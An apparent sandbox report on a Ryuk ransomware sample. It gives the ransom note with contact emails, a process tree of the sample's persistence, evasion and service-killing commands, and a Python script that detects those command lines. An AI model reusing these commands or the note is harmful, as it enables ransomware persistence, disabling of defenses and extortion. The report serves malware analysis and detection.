Analysis

  • max time kernel
    137s
  • max time network
    52s
  • platform
    windows7_x64
  • resource
    win7-20220901-en
  • resource tags
    arch:x64, arch:x86, image:win7-20220901-en, locale:en-us, os:windows7-x64, system
  • submitted
    20-10-2022 15:40

General

  • Target

    775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe

  • Size

    885KB

  • MD5

    a650d5676dc2c91a3af2216044ddaf8c

  • SHA1

    851eea629fda6f930ebfd7ac45de5e8bc3f506b5

  • SHA256

    775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6

  • SHA512

    463c54b4fc50ccfe889ab797339afa3f9096c53f8e551a616829b655f218238f53fc9aa9e6908675fed6be8883a555831af4ae1cc348eb80e937f27b34c760c7

  • SSDEEP

    12288:q/2O9w8wycU2JlJYqWYgeWYg955/155/0QebUlAAsjsKqgooRn6X:qbC8tUlqgQKUKRjsKqgbN6

Malware Config

Extracted

Path

C:\ProgramData\RyukReadMe.txt

Ransom Note
Your network has been penetrated. All files on each host in the network have been encrypted with a strong algorithm. Backups were either encrypted Shadow copies also removed, so F8 or any other methods may damage encrypted data but not recover. We exclusively have decryption software for your situation. More than a year ago, world experts recognized the impossibility of deciphering by any means except the original decoder. No decryption software is available in the public. Antiviruse companies, researchers, IT specialists, and no other persons cant help you decrypt the data. DO NOT RESET OR SHUTDOWN - files may be damaged. DO NOT DELETE readme files. To confirm our honest intentions.Send 2 different random files and you will get it decrypted. It can be from different computers on your network to be sure that one key decrypts everything. 2 files we unlock for free To get info (decrypt your files) contact us at filereopening@msgden.com or filereopening@cyberfear.com You will receive btc address for payment in the reply letter Ryuk No system is safe
Emails

filereopening@msgden.com

filereopening@cyberfear.com

Signatures

  • Ryuk
    Ransomware distributed via existing botnets, often Trickbot or Emotet.
  • Disables Task Manager via registry modification
  • Drops startup file (3 IoCs)
  • Modifies file permissions (1 TTP, 1 IoC)
  • Enumerates connected drives (3 TTPs, 24 IoCs)
    Attempts to read the root path of hard drives other than the default C: drive.
  • Drops file in Program Files directory (64 IoCs)
  • Enumerates physical storage devices (1 TTP)
    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
  • Creates scheduled task(s) (1 TTP, 4 IoCs)
    Schtasks is often used by malware for persistence or to perform post-infection execution.
  • Kills process with taskkill (2 IoCs)
  • Suspicious behavior: EnumeratesProcesses (64 IoCs)
  • Suspicious use of AdjustPrivilegeToken (2 IoCs)
  • Suspicious use of WriteProcessMemory (64 IoCs)
  • Views/modifies file attributes (1 TTP, 3 IoCs)

Processes

  • C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
    "C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe"
    1⤵
    • Enumerates connected drives
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:860
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:840
      • C:\Windows\system32\schtasks.exe
        schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F
        3⤵
        • Creates scheduled task(s)
        PID:2044
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
      2⤵
      • Drops startup file
      PID:1736
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
      2⤵
      PID:268
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1528
      • C:\Windows\system32\schtasks.exe
        schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F
        3⤵
        • Creates scheduled task(s)
        PID:588
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c attrib +h +s "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:332
      • C:\Windows\system32\attrib.exe
        attrib +h +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
        3⤵
        • Drops startup file
        • Views/modifies file attributes
        PID:596
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe" /RU SYSTEM /RL HIGHEST /F
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:612
      • C:\Windows\system32\schtasks.exe
        schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe" /RU SYSTEM /RL HIGHEST /F
        3⤵
        • Creates scheduled task(s)
        PID:1516
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe" /F
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:528
      • C:\Windows\system32\schtasks.exe
        schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe" /F
        3⤵
        • Creates scheduled task(s)
        PID:1732
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c attrib +h +s ryuk.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:700
      • C:\Windows\system32\attrib.exe
        attrib +h +s ryuk.exe
        3⤵
        • Views/modifies file attributes
        PID:1784
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\ryuk.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1376
      • C:\Windows\system32\attrib.exe
        attrib +h +s C:\ProgramData\ryuk.exe
        3⤵
        • Views/modifies file attributes
        PID:460
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c start cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:288
      • C:\Windows\system32\cmd.exe
        cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q
        3⤵
        PID:1012
        • C:\Windows\system32\icacls.exe
          icacls * /grant Everyone:(OI)(CI)F /T /C /Q
          4⤵
          • Modifies file permissions
          PID:1660
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:540
      • C:\Windows\system32\reg.exe
        reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
        3⤵
        PID:304
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c start cmd.exe /c taskkill /t /f /im sql* && taskkill /f /t /im veeam* && taskkill /F /T /IM MSExchange* && taskkill /F /T /IM Microsoft.Exchange* && taskkill /F /T /IM pvx* && taskkill /F /T /IM dbsrv* && exit
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1432
      • C:\Windows\system32\cmd.exe
        cmd.exe /c taskkill /t /f /im sql*
        3⤵
        PID:1192
        • C:\Windows\system32\taskkill.exe
          taskkill /t /f /im sql*
          4⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1912
      • C:\Windows\system32\taskkill.exe
        taskkill /f /t /im veeam*
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1944
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c Copy hrmlog1 C:\ProgramData\hrmlog1
      2⤵
      PID:2012
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c Copy hrmlog2 C:\ProgramData\hrmlog2
      2⤵
      PID:2024
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c Copy RYUKID C:\ProgramData\RYUKID
      2⤵
      PID:1568
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c Copy C:\ProgramData\hrmlog1 %userprofile%\Desktop\hrmlog1
      2⤵
      PID:1648
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c Copy "C:\ProgramData\RyukReadMe.txt " "%userprofile%\Desktop\RyukReadMe.txt "
      2⤵
      PID:1420
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
      2⤵
      PID:1892
      • C:\Windows\system32\reg.exe
        reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
        3⤵
        PID:2004
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
      2⤵
      PID:1036
      • C:\Windows\system32\reg.exe
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
        3⤵
        PID:580
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F
      2⤵
      PID:1040
      • C:\Windows\system32\reg.exe
        reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F
        3⤵
        PID:1728
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F
      2⤵
      PID:1384
      • C:\Windows\system32\reg.exe
        reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F
        3⤵
        PID:1528
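The process tree above is, in effect, a list of command lines a defender can match on. The block below is an added example, not part of this report and not the sandbox's own signature logic: it runs regex rules over process-creation command lines (assumed to be the CommandLine field of Sysmon Event ID 1 or Security event 4688) and maps each hit to the report's signature name. RYUK_CMDLINES is copied from the tree; BENIGN_CMDLINES are constructed administrative look-alikes with hypothetical Contoso paths that must not fire. Three rules carry the label "(no sandbox signature in this report)": the Windows Defender DisableAntiSpyware policy, EnableLinkedConnections and the SafeBoot key deletion are all in the tree but have no entry in the Signatures list.

```python
"""Command-line detections for the behaviours in the process tree above (added
example, not part of the sandbox report). Input is the command line of a
process-creation event (Sysmon Event ID 1 / Security 4688). RYUK_CMDLINES are
copied from the tree; BENIGN_CMDLINES are constructed administrative look-alikes."""
import re
from collections import namedtuple

Finding = namedtuple("Finding", "rule signature cmdline")

# Rules key on argument shapes, not on the literal names RYUK/ryk/ryuk.exe, so a
# renamed build still matches. Signature strings are the report's own names.
RULES = [
    ("schtasks ONLOGON task whose action lives in ProgramData or a user profile",
     "Creates scheduled task(s)",
     re.compile(r'schtasks\s+/create\b.*?/sc\s+onlogon\b.*?/tr\s+"?'
                r'c:\\(?:programdata|users\\[^\\"]+\\appdata)\b', re.I)),
    ("copy of an executable into a Start Menu Startup folder",
     "Drops startup file",
     re.compile(r'\bcopy\s+.*\.exe\s+"?[^"]*\\start menu\\programs\\startup\\', re.I)),
    ("icacls grants Everyone full control recursively",
     "Modifies file permissions",
     re.compile(r'icacls\s+.*?/grant\s+everyone:\(oi\)\(ci\)f\b.*?/t\b', re.I)),
    ("attrib sets hidden+system on an executable",
     "Views/modifies file attributes",
     re.compile(r'attrib\s+\+h\s+\+s\s+.*\.exe\b', re.I)),
    ("reg add sets DisableTaskMgr=1",
     "Disables Task Manager via registry modification",
     re.compile(r'reg\s+add\s+.*\\policies\\system\s+/v\s+disabletaskmgr\b.*/d\s+1\b', re.I)),
    ("reg add sets Windows Defender DisableAntiSpyware=1",
     "(no sandbox signature in this report)",
     re.compile(r'reg\s+add\s+.*windows\s+defender"?\s+/v\s+disableantispyware\b.*/d\s+1\b', re.I)),
    ("reg add sets EnableLinkedConnections=1 (elevated token sees mapped drives)",
     "(no sandbox signature in this report)",
     re.compile(r'reg\s+add\s+.*\\policies\\system\s+/v\s+enablelinkedconnections\b.*/d\s+1\b', re.I)),
    ("reg delete wipes the SafeBoot key",
     "(no sandbox signature in this report)",
     re.compile(r'reg\s+delete\s+\S*\\control\\safeboot\b', re.I)),
    ("taskkill wildcard against database, backup or mail processes",
     "Kills process with taskkill",
     re.compile(r'taskkill\s+(?:/\w+\s+)*/im\s+'
                r'(?:sql|veeam|msexchange|microsoft\.exchange|pvx|dbsrv)[\w.]*\*', re.I)),
]

RYUK_CMDLINES = [  # copied from the process tree above, in tree order
    r'schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F',
    r'C:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"',
    r'C:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"',
    r'schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F',
    r'attrib +h +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"',
    r'schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe" /RU SYSTEM /RL HIGHEST /F',
    r'schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe" /F',
    r'attrib +h +s ryuk.exe',
    r'attrib +h +s C:\ProgramData\ryuk.exe',
    r'icacls * /grant Everyone:(OI)(CI)F /T /C /Q',
    r'reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f',
    r'cmd.exe /c taskkill /t /f /im sql* && taskkill /f /t /im veeam* && taskkill /F /T /IM MSExchange* && taskkill /F /T /IM Microsoft.Exchange* && taskkill /F /T /IM pvx* && taskkill /F /T /IM dbsrv* && exit',
    r'reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f',
    r'reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f',
    r'reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F',
    r'reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F',
]

BENIGN_CMDLINES = [  # constructed look-alikes (hypothetical Contoso paths); none should fire
    r'schtasks /Create /SC ONLOGON /TN "Contoso Tray" /TR "C:\Program Files\Contoso\tray.exe" /F',
    r'schtasks /Create /SC DAILY /ST 02:00 /TN "Contoso Update" /TR "C:\ProgramData\Contoso\update.exe" /RU SYSTEM /F',
    r'icacls "D:\Shares\Finance\Q3.xlsx" /grant CONTOSO\jsmith:(R)',
    r'attrib +r "C:\Users\Admin\Documents\notes.txt"',
    r'reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f',
    r'taskkill /F /IM notepad.exe',
]


def scan(cmdlines):
    """One Finding per (command line, rule) pair that matches."""
    return [Finding(rule, sig, line)
            for line in cmdlines
            for rule, sig, rx in RULES
            if rx.search(line)]


def killed_images(cmdline):
    """Image names passed to taskkill /IM anywhere in a chained command line."""
    return re.findall(r'taskkill\s+(?:/\w+\s+)*/im\s+(\S+)', cmdline, re.I)


def unflagged_by_sandbox(findings):
    """Rules that fired although the report's signature list has no entry for them."""
    return sorted({f.rule for f in findings if f.signature.startswith("(no sandbox")})


if __name__ == "__main__":
    for f in scan(RYUK_CMDLINES):
        print(f"[{f.signature}] {f.rule}\n    {f.cmdline}")
    print("taskkill targets:", killed_images(RYUK_CMDLINES[11]))
    print("benign lines flagged:", len(scan(BENIGN_CMDLINES)))
```

The rules key on argument shapes (an ONLOGON task whose action sits in ProgramData or a profile directory, Everyone:(OI)(CI)F combined with /T, +h +s on an executable) rather than on the names RYUK, ryk or ryuk.exe, so a renamed build still matches; the second benign line shows that a SYSTEM task in ProgramData alone does not fire without the ONLOGON trigger. The HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot delete fails on a real host because SafeBoot exists only under HKEY_LOCAL_MACHINE, but the attempt is still worth an alert, so the SafeBoot rule ignores the hive.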

Network

MITRE ATT&CK Matrix (ATT&CK v6)

  • Execution
    T1053 Scheduled Task (1)
  • Persistence
    T1053 Scheduled Task (1)
    T1158 Hidden Files and Directories (1)
  • Privilege Escalation
    T1053 Scheduled Task (1)
  • Defense Evasion
    T1222 File Permissions Modification (1)
    T1158 Hidden Files and Directories (1)
  • Discovery
    T1012 Query Registry (1)
    T1120 Peripheral Device Discovery (1)
    T1082 System Information Discovery (2)

Downloads

  • C:\ProgramData\RYUKID
    Filesize
    8B
    MD5
    f7c9aa8109768d75ea7402cb915b51be
    SHA1
    cc649a88c2266ae98c2c378a138329e9dcf1832a
    SHA256
    a2ed9868223619ce158c30a1701f34935ff847d72a72b970be812bc91b5440fa
    SHA512
    bc70b35f2a6feecb023aad2541cd2f5a838deff88d09fbd5217f27766c845c44c2fdfa01d441a8fb130201771ddd273bf73c982388970783133e7960a7e8c4c7

  • C:\ProgramData\RyukReadMe.txt
    Filesize
    1KB
    MD5
    e5776afce2e7d6fa4feb7a0c4bc2e004
    SHA1
    8b3cd15a7e34d4b1c0800dad92a07c60647f44dd
    SHA256
    4ce8d384cf4f82223dde53c4fe9e9e4a249140068ecc9146b6d68c14278a3be7
    SHA512
    d03dafeae3ccced40bc20dcbc5cfffc13ec01b163d0d7ff5291c088f3e56971645837a0f3405c32fc6467a2d39d2396645b3eac0b2076d88a3110c42b53cd7c6

  • C:\ProgramData\hrmlog1
    Filesize
    2KB
    MD5
    bf3dc7e7792a2b38f146440ad4f79a22
    SHA1
    a323a963c8efbd3480399611c34bd38a0c8f6721
    SHA256
    f4d7c30ba27ee50ca45ee00ab69fc3462c996f3a7834065fa87b79843c8a7b41
    SHA512
    04cc52de3b394400dbafcdc781f9c0be32dc351ef45c9bc8efaaa76a74eadbbdf4b218b79ade19a53aa636a7c6031b4260177665e835beea3c52eaed726dd805

  • C:\ProgramData\hrmlog2
    Filesize
    292B
    MD5
    9dbd99471b38780584934dce1c838dc8
    SHA1
    8826b382ab74a575991fc5a5747bea695913199b
    SHA256
    02c6fdbb283fb9236e42ab6a98a64dbaf487fa5d888727d88a90f7ff6dcd378a
    SHA512
    01f54374959431e106c57d6389e361cb58ea60b9b99ab52f7bf3746dd63115e74a46f7bb741f8494d0b7b9be944f9ac358690f248d4a036cde7c0c48e388e46b

  • C:\ProgramData\ryuk.exe
    Filesize
    885KB
    MD5
    a650d5676dc2c91a3af2216044ddaf8c
    SHA1
    851eea629fda6f930ebfd7ac45de5e8bc3f506b5
    SHA256
    775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6
    SHA512
    463c54b4fc50ccfe889ab797339afa3f9096c53f8e551a616829b655f218238f53fc9aa9e6908675fed6be8883a555831af4ae1cc348eb80e937f27b34c760c7

  • C:\Users\Admin\AppData\Local\Temp\RYUKID
    Filesize
    8B
    MD5
    f7c9aa8109768d75ea7402cb915b51be
    SHA1
    cc649a88c2266ae98c2c378a138329e9dcf1832a
    SHA256
    a2ed9868223619ce158c30a1701f34935ff847d72a72b970be812bc91b5440fa
    SHA512
    bc70b35f2a6feecb023aad2541cd2f5a838deff88d09fbd5217f27766c845c44c2fdfa01d441a8fb130201771ddd273bf73c982388970783133e7960a7e8c4c7

  • C:\Users\Admin\AppData\Local\Temp\hrmlog1
    Filesize
    2KB
    MD5
    bf3dc7e7792a2b38f146440ad4f79a22
    SHA1
    a323a963c8efbd3480399611c34bd38a0c8f6721
    SHA256
    f4d7c30ba27ee50ca45ee00ab69fc3462c996f3a7834065fa87b79843c8a7b41
    SHA512
    04cc52de3b394400dbafcdc781f9c0be32dc351ef45c9bc8efaaa76a74eadbbdf4b218b79ade19a53aa636a7c6031b4260177665e835beea3c52eaed726dd805

  • C:\Users\Admin\AppData\Local\Temp\hrmlog2
    Filesize
    292B
    MD5
    9dbd99471b38780584934dce1c838dc8
    SHA1
    8826b382ab74a575991fc5a5747bea695913199b
    SHA256
    02c6fdbb283fb9236e42ab6a98a64dbaf487fa5d888727d88a90f7ff6dcd378a
    SHA512
    01f54374959431e106c57d6389e361cb58ea60b9b99ab52f7bf3746dd63115e74a46f7bb741f8494d0b7b9be944f9ac358690f248d4a036cde7c0c48e388e46b

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe
    Filesize
    885KB
    MD5
    a650d5676dc2c91a3af2216044ddaf8c
    SHA1
    851eea629fda6f930ebfd7ac45de5e8bc3f506b5
    SHA256
    775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6
    SHA512
    463c54b4fc50ccfe889ab797339afa3f9096c53f8e551a616829b655f218238f53fc9aa9e6908675fed6be8883a555831af4ae1cc348eb80e937f27b34c760c7

  • memory/268-58-0x0000000000000000-mapping.dmp
  • memory/288-72-0x0000000000000000-mapping.dmp
  • memory/304-76-0x0000000000000000-mapping.dmp
  • memory/332-61-0x0000000000000000-mapping.dmp
  • memory/460-71-0x0000000000000000-mapping.dmp
  • memory/528-66-0x0000000000000000-mapping.dmp
  • memory/540-74-0x0000000000000000-mapping.dmp
  • memory/580-98-0x0000000000000000-mapping.dmp
  • memory/588-60-0x0000000000000000-mapping.dmp
  • memory/596-62-0x0000000000000000-mapping.dmp
  • memory/612-64-0x0000000000000000-mapping.dmp
  • memory/700-68-0x0000000000000000-mapping.dmp
  • memory/840-54-0x0000000000000000-mapping.dmp
  • memory/860-103-0x000007FEFB741000-0x000007FEFB743000-memory.dmp
    Filesize
    8KB
  • memory/1012-73-0x0000000000000000-mapping.dmp
  • memory/1036-97-0x0000000000000000-mapping.dmp
  • memory/1040-99-0x0000000000000000-mapping.dmp
  • memory/1192-77-0x0000000000000000-mapping.dmp
  • memory/1376-70-0x0000000000000000-mapping.dmp
  • memory/1384-101-0x0000000000000000-mapping.dmp
  • memory/1420-93-0x0000000000000000-mapping.dmp
  • memory/1432-75-0x0000000000000000-mapping.dmp
  • memory/1516-65-0x0000000000000000-mapping.dmp
  • memory/1528-102-0x0000000000000000-mapping.dmp
  • memory/1528-59-0x0000000000000000-mapping.dmp
  • memory/1568-87-0x0000000000000000-mapping.dmp
  • memory/1648-91-0x0000000000000000-mapping.dmp
  • memory/1660-78-0x0000000000000000-mapping.dmp
  • memory/1728-100-0x0000000000000000-mapping.dmp
  • memory/1732-67-0x0000000000000000-mapping.dmp
  • memory/1736-56-0x0000000000000000-mapping.dmp
  • memory/1784-69-0x0000000000000000-mapping.dmp
  • memory/1892-95-0x0000000000000000-mapping.dmp
  • memory/1912-84-0x0000000000000000-mapping.dmp
  • memory/1944-79-0x0000000000000000-mapping.dmp
  • memory/2004-96-0x0000000000000000-mapping.dmp
  • memory/2012-80-0x0000000000000000-mapping.dmp
  • memory/2024-83-0x0000000000000000-mapping.dmp
  • memory/2044-55-0x0000000000000000-mapping.dmp